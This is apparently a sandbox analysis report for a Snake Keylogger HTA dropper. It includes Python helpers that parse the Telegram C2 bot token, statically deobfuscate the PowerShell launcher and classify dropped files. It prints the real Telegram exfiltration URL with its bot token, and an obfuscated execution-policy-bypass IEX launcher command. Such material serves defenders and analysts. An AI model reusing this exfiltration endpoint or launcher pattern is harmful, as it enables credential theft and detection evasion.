Analysis

  • max time kernel
    16s
  • max time network
    112s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    16-10-2024 01:41

General

  • Target

    4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368.hta

  • Size

    165KB

  • MD5

    44ad3c49b38f4f6f1739baf86d528fd3

  • SHA1

    afcf27df0ee2373846a1f6b8027e9cfcea77c486

  • SHA256

    4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368

  • SHA512

    e2846bdafad1f3f2901171d3e3ca5744cd934ec6231bcef14327e17a8ac2aa225e254d25e1abca4a3465994979fa480b8f8a90be21754bb7a8f457d68102f691

  • SSDEEP

    96:Ea+n7bJh/qUh/qoR3hH+TJoAj/h/q9+SAT:Ea+7bJ5/pLA78WT

Malware Config

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450
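
The C2 above is the Telegram Bot API, so the hunt indicator is the bot token (the `bot<id>:<secret>` path segment) and the chat_id, not the host: api.telegram.org is shared, legitimate infrastructure. The following is an added example written for this page, not code from the sandbox or the malware; it parses the report's URL into those indicators and shows a loose scanner that pulls bot tokens out of an arbitrary buffer (strings output, a config blob, one of the memory dumps listed under Downloads). The second token in the sample buffer is a constructed dummy used only to show de-duplication.

```python
import re
from urllib.parse import urlsplit, parse_qs

# C2 URL exactly as extracted in the Malware Config section of this report.
REPORT_C2 = ("https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU"
             "/sendMessage?chat_id=7004340450")

# Bot API path layout: /bot<bot_id>:<secret>/<method>. The token is the exfil credential
# and the only campaign-specific part of the URL; chat_id is the operator's inbox.
_BOT_PATH = re.compile(
    r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{30,})/(?P<method>[A-Za-z]+)$")
# Loose form for raw buffers: digits, colon, long secret, not glued to other token characters.
_TOKEN_ANYWHERE = re.compile(rb"(?<![0-9])([0-9]{8,12}):([A-Za-z0-9_-]{30,})(?![A-Za-z0-9_-])")

# Constructed sample buffer: NUL-separated strings around the report's C2 plus one dummy token.
SAMPLE_BLOB = (b"\x00user=Admin\x00" + REPORT_C2.encode("ascii")
               + b"\x00" + b"1234567890:" + b"A" * 35 + b"\x00GetMessage\x00")


def parse_telegram_c2(url: str) -> dict:
    """Split a Telegram Bot API URL into the indicators worth reporting and hunting on."""
    parts = urlsplit(url)
    if parts.hostname != "api.telegram.org":
        raise ValueError(f"not a Telegram Bot API host: {parts.hostname!r}")
    m = _BOT_PATH.match(parts.path)
    if m is None:
        raise ValueError(f"unexpected Bot API path: {parts.path!r}")
    query = parse_qs(parts.query)
    return {
        "bot_id": m["bot_id"],
        "token": f"{m['bot_id']}:{m['secret']}",
        "method": m["method"],
        "chat_id": query.get("chat_id", [None])[0],
    }


def scan_for_bot_tokens(blob: bytes) -> list:
    """Return every distinct Telegram bot token found in a byte buffer, sorted."""
    return sorted({f"{bid.decode()}:{sec.decode()}" for bid, sec in _TOKEN_ANYWHERE.findall(blob)})


if __name__ == "__main__":
    print(parse_telegram_c2(REPORT_C2))
    print(scan_for_bot_tokens(SAMPLE_BLOB))
```

In practice the token is what gets reported to Telegram for revocation and what goes into the blocklist; on the network side, look for TLS connections to api.telegram.org from a process that is not a browser or the Telegram client (here the hollowed RegSvcs.exe), since blocking the host outright breaks legitimate use.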

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2908
    • C:\Windows\SysWOW64\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE
      "C:\Windows\sysTeM32\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE" "pOwerSHelL -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt ; IeX($(IEx('[sySTeM.tExt.EncOdInG]'+[cHaR]0x3a+[CHAR]58+'UTf8.geTstrINg([SySteM.coNVeRt]'+[CHar]0X3A+[Char]58+'frOmbase64striNG('+[cHar]34+'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'+[CHAR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2252
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2892
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\_99j9dfn.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2856
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6BC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA6BB.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2776
      • C:\Users\Admin\AppData\Roaming\taskhostw.exe
        "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1392
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          4⤵
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2100
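
The PowerShell launcher in the process tree hides its real expression behind two tricks: mixed-case, abbreviated switches (PowerShell accepts any unambiguous prefix of a parameter name, so -ex, -NOP and -w 1 are -ExecutionPolicy Bypass, -NoProfile and -WindowStyle Hidden) and a string built from single-quoted fragments joined with [char]N pieces so that the `::` member operator and the quotes around the base64 argument never appear literally. The decoder below is an added example written for this page, not the sandbox's own tooling; it resolves that concatenation statically (PowerShell is never executed) and base64-decodes the argument. Because the report elides the real base64 blob, the sample launcher here has the same shape as the one above but carries a constructed, harmless placeholder as stage 2.

```python
import base64
import re

# Constructed sample with the same structure as the launcher in the process tree above.
# The report elides the real base64 argument, so a harmless placeholder stage-2 string is
# substituted; nothing about the actual payload is assumed.
SAMPLE_STAGE2 = "Write-Host 'stage2 placeholder'"
SAMPLE_B64 = base64.b64encode(SAMPLE_STAGE2.encode("utf-8")).decode("ascii")
SAMPLE_LAUNCHER = (
    "pOwerSHelL -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt ; "
    "IeX($(IEx('[sySTeM.tExt.EncOdInG]'+[cHaR]0x3a+[CHAR]58"
    "+'UTf8.geTstrINg([SySteM.coNVeRt]'+[CHar]0X3A+[Char]58"
    "+'frOmbase64striNG('+[cHar]34+'" + SAMPLE_B64 + "'+[CHAR]0x22+'))')))"
)

# One token per concatenation piece: a single-quoted literal, or [char]N in hex or decimal.
_PIECE = re.compile(r"'([^']*)'|\[char\](0x[0-9a-f]+|[0-9]+)", re.IGNORECASE)
_B64_ARG = re.compile(r'frombase64string\("([A-Za-z0-9+/=]+)"\)', re.IGNORECASE)


def resolve_concat(expr: str) -> str:
    """Join literal and [char]N pieces in order, without evaluating anything."""
    out = []
    for literal, code in _PIECE.findall(expr):
        if code:
            base = 16 if code.lower().startswith("0x") else 10
            out.append(chr(int(code, base)))
        else:
            out.append(literal)
    return "".join(out)


def launcher_flags(cmdline: str) -> dict:
    """Normalise the abbreviated, mixed-case switches into the properties a hunt rule keys on."""
    low = cmdline.lower()
    return {
        "execution_policy_bypass": re.search(r"-ex\w*\s+bypass", low) is not None,
        "no_profile": re.search(r"-nop\w*\b", low) is not None,
        "hidden_window": re.search(r"-w\w*\s+(?:1|hidden)\b", low) is not None,
        "invoke_expression": re.search(r"\b(?:iex|invoke-expression)\b", low) is not None,
    }


def decode_launcher(cmdline: str) -> dict:
    """Recover the inner expression and the base64-encoded stage 2 from a launcher command line."""
    inner = resolve_concat(cmdline)
    match = _B64_ARG.search(inner)
    if match is None:
        raise ValueError("no FromBase64String(...) argument found after resolving the concatenation")
    stage2 = base64.b64decode(match.group(1)).decode("utf-8")
    return {"flags": launcher_flags(cmdline), "inner_expression": inner, "stage2": stage2}


if __name__ == "__main__":
    result = decode_launcher(SAMPLE_LAUNCHER)
    print(result["flags"])
    print(result["inner_expression"])
    print(result["stage2"])
```

Resolving the fragments gives the canonical `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("..."))` expression, which is why a detection that looks for that literal string in a command line misses this sample while one that checks for `[char]0x3a`/`[char]58` joined with `+` next to an IEX does not. On a real launcher from telemetry, run the same function on the command line and treat the decoded stage 2 as the next artifact to analyse.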

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESA6BC.tmp

    Filesize

    1KB

    MD5

    ed2baaffc4fc083f868c04c033c7a66d

    SHA1

    1a25db2a8ea9acad652a0762a98187dd59c06569

    SHA256

    158739f824ae8962a3fdcefd28378a9609b7fad46690b8b1921d7fb2916cff0a

    SHA512

    e46c3fe4328f3b42845b8ac86ee21bd28cc38a2e261c390f81ea83b7a45de33c01b2c0376ea4602cbf451f68e8cda129e81ed4da280a6a4d6f57d61d232b387b

  • C:\Users\Admin\AppData\Local\Temp\_99j9dfn.dll

    Filesize

    3KB

    MD5

    2ea51eefa730542821fd43a352c193b4

    SHA1

    fea0eb88d22d35b16e0ee79e28e5a2134cec1650

    SHA256

    8ca6b70d0e7706fa03a4808cf3643eb9870bbc7d0a8e09e371e1e08e126420d8

    SHA512

    670384971c88b162efb250c5aef1aa81a3ad509344051c4bf9255d2e67b3c296ef9908431733127a30c6f1a7e1276cd0f7c169fa6297aa4f2e894e6502a5bf2f

  • C:\Users\Admin\AppData\Local\Temp\_99j9dfn.pdb

    Filesize

    7KB

    MD5

    b7ba7fdf0ab8286e9039693f6d582d80

    SHA1

    1a7b717fe061c656dd7b33501add0a33edab9ef9

    SHA256

    a4a958148add2d50d8c545641d0abe4823e6824092c82619f01a3db1a7c4c3b5

    SHA512

    7ca66f30eec0caeb5e99c102509ea1b38957be36b66c3657e1f4d66deff4c3a414c334f2dc811b93b5f6b3bf37db803ebd537e26ecfe4aef50be78f821e80d5f

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    6093d9d65098cad1a18f64e698d15d64

    SHA1

    785b2728821e483ce886306c5c09cef431dba41e

    SHA256

    fcb9dac2d9d9ba8b84495fd817780b22a80b1ee109d44e7d2c2c08a334b933b2

    SHA512

    d2ffc707af256c5de051434baa8c733567b72956e682091b48486d9e93df60ea8f812e0b0dcecea9a1c4d02c1d457ee2582764e25adb6ec64e73356e96b1d486

  • C:\Users\Admin\AppData\Roaming\taskhostw.exe

    Filesize

    948KB

    MD5

    3e2f27edd3deacd8f08f6ed1133b2040

    SHA1

    060e3218949c5a006bb8607e8228e6539b737bfb

    SHA256

    163a25e2b68ed09eb4cf82f28c87568969091764bdfb4140b4675a00e2d2ed86

    SHA512

    da437c39e3337f6750c3b9353c71999c16415ec1fecdaa4bba676bb12207cb51a7258b91b175d1893ae4e9111fa9ccf027151ad7527d9d78df59f86436cfdb42

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCA6BB.tmp

    Filesize

    652B

    MD5

    cd4b415852ddd09d6e7d143d0a00f56d

    SHA1

    6fad24bc27d4e5c8f590f34c1910507b5b3f8f9a

    SHA256

    ad16e1d3a0b09073b10837e6a923965dcf72a374cc30bbfd8cc651e3db41d896

    SHA512

    5260fa480bc4c81d7165bf27ea7464952192bd063b56301646a22411da452622768b4aca6c3eaea449a2ae7e627c3ea5c19c4320e8c5eed9bbc545b5d11540e3

  • \??\c:\Users\Admin\AppData\Local\Temp\_99j9dfn.0.cs

    Filesize

    475B

    MD5

    ecc2c10cb4c5954e2d5156bce54e41f4

    SHA1

    2d7cde31f9942c1dc80c493c03d675962991bf31

    SHA256

    21d7b2d886e9a8c3cf70d60b612151ecf35df156524dda00bc5f0c14df45b3ac

    SHA512

    bfce3f87e8f97f1a8f149c7f3e172e312019a4189fd1e33bdb7d2c617c6bbf41f548e91c12f71b5e8215397138ea643430f0ee87d72b33760c0dd2e3b8ae4d96

  • \??\c:\Users\Admin\AppData\Local\Temp\_99j9dfn.cmdline

    Filesize

    309B

    MD5

    a1afc9ecf40afd1c5576603a221009c1

    SHA1

    74d4eea41de07b2aaf098f37ebe86f470189ced3

    SHA256

    1cf344dbc2e6dd2b6c4bd43a47c68ad30681e935e9d579e3bd7e491de5faa865

    SHA512

    8b11fc8c9000f22b3379d73c6cda66661d5b2c0725d133346984121f38d442e85218f06d502c0bf0bc9505e8d6a391289e539c94f48a9feeec922ea016775efb

  • memory/2100-36-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2100-35-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2100-34-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB
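
The file list above is more telling than its hashes: the `_99j9dfn.cmdline`, `_99j9dfn.0.cs`, `_99j9dfn.dll` and `_99j9dfn.pdb` set in %TEMP%, together with the RES*.tmp and CSC*.tmp files, is the residue csc.exe leaves when PowerShell's Add-Type compiles C# on the fly (matching the csc.exe and cvtres.exe children of PID 2252 in the process tree); `taskhostw.exe` in %APPDATA% borrows the name of a Windows 10 system binary that has no legitimate copy in a user profile (and does not exist at all on the Windows 7 image used here, whose equivalent is taskhost.exe); the .customDestinations-ms file is jump-list residue from the script execution. The classifier below is an added example for this page, not part of the report, that applies those three checks to the paths listed above; the list of borrowed system-binary names is an assumption chosen for illustration.

```python
import re
from pathlib import PureWindowsPath

# Dropped-file paths copied from the Downloads list of this report (memory dump entries omitted).
REPORT_PATHS = [
    r"C:\Users\Admin\AppData\Local\Temp\RESA6BC.tmp",
    r"C:\Users\Admin\AppData\Local\Temp\_99j9dfn.dll",
    r"C:\Users\Admin\AppData\Local\Temp\_99j9dfn.pdb",
    r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations"
    r"\d93f411851d7c929.customDestinations-ms",
    r"C:\Users\Admin\AppData\Roaming\taskhostw.exe",
    r"\??\c:\Users\Admin\AppData\Local\Temp\CSCA6BB.tmp",
    r"\??\c:\Users\Admin\AppData\Local\Temp\_99j9dfn.0.cs",
    r"\??\c:\Users\Admin\AppData\Local\Temp\_99j9dfn.cmdline",
]

# Assumed list of Windows binary names malware commonly borrows; genuine copies live under
# %SystemRoot%, so any of these outside the Windows directory is a masquerade.
SYSTEM_BINARY_NAMES = {"taskhostw.exe", "taskhost.exe", "svchost.exe", "csrss.exe", "explorer.exe"}
# csc.exe compile unit: <8-char random stem>.cmdline / .0.cs / .dll / .pdb
_COMPILE_UNIT = re.compile(r"([a-z0-9_]{8})(?:\.0)?\.(cmdline|cs|dll|pdb)")
# Companion temp files: RESxxxx.tmp (cvtres output) and CSCxxxx.tmp (resource script)
_COMPILE_TMP = re.compile(r"(?:res|csc)[0-9a-f]{4}\.tmp")


def normalize(raw: str) -> PureWindowsPath:
    """Drop the NT-namespace '\\??\\' prefix the sandbox reports for some handles."""
    return PureWindowsPath(raw[4:] if raw.startswith("\\??\\") else raw)


def classify_drops(paths) -> dict:
    """Group dropped files into Add-Type compile residue, masquerading binaries and jump-list residue."""
    compile_units = {}  # stem -> set of extensions seen
    compile_tmps, masquerades, jump_lists = [], [], []
    for raw in paths:
        p = normalize(raw)
        name = p.name.lower()
        parts = [s.lower().rstrip("\\") for s in p.parts]
        in_temp = "temp" in parts
        under_windows = len(parts) > 1 and parts[1] == "windows"
        m = _COMPILE_UNIT.fullmatch(name)
        if m and in_temp:
            compile_units.setdefault(m.group(1), set()).add(m.group(2))
        elif _COMPILE_TMP.fullmatch(name) and in_temp:
            compile_tmps.append(str(p))
        if name in SYSTEM_BINARY_NAMES and not under_windows:
            masquerades.append(str(p))
        if name.endswith(".customdestinations-ms"):
            jump_lists.append(str(p))
    # Only report a stem when both the C# source and the csc response file are present,
    # which is the signature of a complete in-memory Add-Type round trip.
    add_type = {stem: sorted(exts) for stem, exts in compile_units.items() if {"cmdline", "cs"} <= exts}
    return {
        "add_type_compile": add_type,
        "compile_temp_files": compile_tmps,
        "masquerading_binaries": masquerades,
        "jump_list_residue": jump_lists,
    }


if __name__ == "__main__":
    for key, value in classify_drops(REPORT_PATHS).items():
        print(key, value)
```

The `.0.cs` and `.cmdline` files are the ones worth retrieving from the sandbox: they contain the C# source PowerShell compiled, and with Snake Keylogger droppers that is typically a small P/Invoke shim. The RegSvcs.exe child of PID 1392 runs with the command line of taskhostw.exe, which together with the SetThreadContext, MapViewOfSection and WriteProcessMemory signatures on that parent is consistent with the dropped AutoIT executable hollowing a .NET host; the memory/2100-* dumps at 0x400000 are therefore the unpacked image, and the Malware Config section's C2 was extracted from that rather than from the 948KB file on disk.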